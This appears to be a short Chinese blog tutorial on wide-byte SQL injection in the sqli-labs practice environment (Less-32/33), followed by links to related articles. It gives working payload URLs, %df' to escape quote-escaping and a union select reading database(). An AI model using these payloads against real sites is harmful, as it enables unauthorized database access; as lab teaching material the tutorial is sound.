小课堂 -- 宽字节注入

简介: 小课堂 -- 宽字节注入

环境sqli-labs

 

less 32

 

一、输入特殊字符,都被转义了

http://192.168.1.121/sqli/Less-32/?id=1\

image.png

 

http://192.168.1.121/sqli/Less-32/?id=1'

image.png

 

http://192.168.1.121/sqli/Less-32/?id=1''

image.png

 

二、构造宽字节闭合

http://192.168.1.121/sqli/Less-32/?id=1%df' --+

理论上%81-%FE均可

image.png

 

三、联合查询数据库

http://192.168.1.121/sqli/Less-32/?id=-1%df' union select 1,database(),3 --+

image.png

 

less 33

同上

 

禁止非法,后果自负

目录
相关文章
|
9月前
|
JavaScript 前端开发
JavaScript随手笔记 --- 对数据进行判断最大位数是否超过八位
JavaScript随手笔记 --- 对数据进行判断最大位数是否超过八位
|
9月前
|
机器学习/深度学习 编译器 C语言
【C语言】数据输出的域宽控制(如何在输出数据时控制0占位)(如何输出前导0)(保留几位小数)(乘法口诀表打印不齐)等问题
【C语言】数据输出的域宽控制(如何在输出数据时控制0占位)(如何输出前导0)(保留几位小数)(乘法口诀表打印不齐)等问题
129 0
|
3月前
DwCC2018双字节内联输入怎么实现?
Dw CC 2018怎么设置允许双字节内联输入?在使用一个Dw CC 2018,有时候需要设置允许双字节内联输入,小编告诉大家怎么设置?
51 21
|
9月前
|
C++
限定宽度(补充)
该内容介绍了一个关于小数显示宽度限定符的示例。在C++代码中,`printf("%5d", 123.45)` 输出结果为 `123.45`, 其中数字前有2个空格,后有4个空格。这是因为默认小数精度为6位,所以123.45后有4个空格,而`%5d`指定至少占用5位,导致前面出现2个空格。
48 1
|
SQL 安全 程序员
宽字节注入详解
宽字节注入详解
159 0
|
9月前
|
关系型数据库 MySQL 数据库
宽字节注入讲解
宽字节注入讲解
63 1
|
9月前
|
关系型数据库 MySQL 数据库
宽字节注入
宽字节注入
49 1
|
9月前
|
数据库
22、宽字节注入
22、宽字节注入
47 0
|
9月前
|
安全 关系型数据库 MySQL
MySQL注入 -- 宽字节注入
MySQL注入 -- 宽字节注入
67 0
|
Python
使用python来理解宽字节注入
使用python来理解宽字节注入
50 0